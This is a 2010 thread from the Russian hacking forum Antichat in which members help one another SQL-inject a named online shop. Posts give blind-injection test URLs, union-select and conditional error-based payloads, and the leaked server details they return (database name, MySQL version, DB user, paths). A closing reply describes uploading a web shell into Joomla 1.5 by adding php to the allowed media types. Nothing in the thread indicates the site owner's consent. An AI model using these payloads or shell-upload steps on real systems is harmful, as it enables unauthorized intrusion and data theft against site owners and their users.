Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.06.2010, 12:46
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
Сообщение от pinch
c чего вы взяли что там inject...
Я думаю, что что-то не по запросу, которые делают изображение не показали
Верно ли это?
|
|
|
04.06.2010, 13:17
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Сообщение от haito
привет команде;
http://beinoma.com/details.php?prodid=974%27 <-не показывать изображения
я пробовал много методов, но никакого результата
Как можно "inject" этот сайт  То что там инекция этот вопрос под самнением.
А второе, там еще и ошибки отключены.
|
|
|
|
04.06.2010, 13:28
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675
Репутация:
10
|
|
Сообщение от haito
привет команде;
http://beinoma.com/details.php?prodid=974%27 <-не показывать изображения
я пробовал много методов, но никакого результата
Как можно "inject" этот сайт Дак попробуй написать
http://beinoma.com/details.php?prodid=974+and+1=1-- если отобразит
http://beinoma.com/details.php?prodid=974+and+1=2--
не отобразит, то крути как слепую.
|
|
|
|
04.06.2010, 15:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от EoGeneo
То что там инекция этот вопрос под сOмнением.
А второе, там еще и ошибки отключены.
молчал бы горе хакер...я утром тебе рекомендовал читать маны..так вот читай и не пости глупости, если ошибки нет это еще не значит что иньекции нет..
http://beinoma.com/details.php?prodid=547&cid=1'
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/p14tnu81/public_html/details.php on line 57
http://beinoma.com/details.php?prodid=547&cid=1+union+select+1,2,3,4, 5--
Последний раз редактировалось Gorev; 04.06.2010 в 15:05..
|
|
|
|
04.06.2010, 15:15
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://beinoma.com/details.php?prodid=547&cid=if((select+substring(version(),1,1)=5),1,(select+1+union+select+2))
POST=y
@@basedir: /
@@tmpdir: /tmp/
database(): p14tnu81_beipoa
@@datadir: /var/lib/mysql/
version(): 5.0.67-community
@@version_compile_os: redhat-linux-gnu
user(): p14tnu81@localhost
|
|
|
|
04.06.2010, 16:21
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
молчал бы горе хакер...я утром тебе рекомендовал читать маны..так вот читай и не пости глупости, если ошибки нет это еще не значит что иньекции нет.. http://beinoma.com/details.php?prodid=547&cid=1' Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/p14tnu81/public_html/details.php on line 57 http://beinoma.com/details.php?prodid=547&cid=1+union+select+1,2,3,4, 5--
вы дяденька зря сердитесь на человека.... и вообще вы можете отличать параметр prodid от параметра сid? автор указал именно параметр prodid
|
|
|
|
04.06.2010, 16:42
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от pinch
вы дяденька зря сердитесь на человека.... и вообще вы можете отличать параметр prodid от параметра сid? автор указал именно параметр prodid
никто ни на кого не сердится...солдат ребенка не обидит как говорится.. и причем здесь параметр пропид или сид? разговор шел о скуле..нате вам скулю...а пашкела вам на блюдечке предоставил...
P.S. с отличалкой у меня пока все нормально...
P.S.2 и к чему ваш пост написан совсем непонятно...
|
|
|
|
04.06.2010, 16:54
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Кстати да. задачи найти скулю на сайте небыло.
Был указан определенный параметр - собственно в нем и искали.
|
|
|
|
04.06.2010, 17:06
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Подскажите или подкиньте ссылку на мануал о том, как залить шелл в joomla! 1.5 имея доступ в админку.
|
|
|
|
04.06.2010, 17:44
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Сообщение от CyberHunter
Подскажите или подкиньте ссылку на мануал о том, как залить шелл в joomla! 1.5 имея доступ в админку.
Ищешь настройки,дописываешь php в разрешенный формат.Идешь в медиа-менеджер и льешь шелл в нужную тебе папку,насколько я понмню (лил давно как раз в 1.5) шелл будет в папке /images .
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
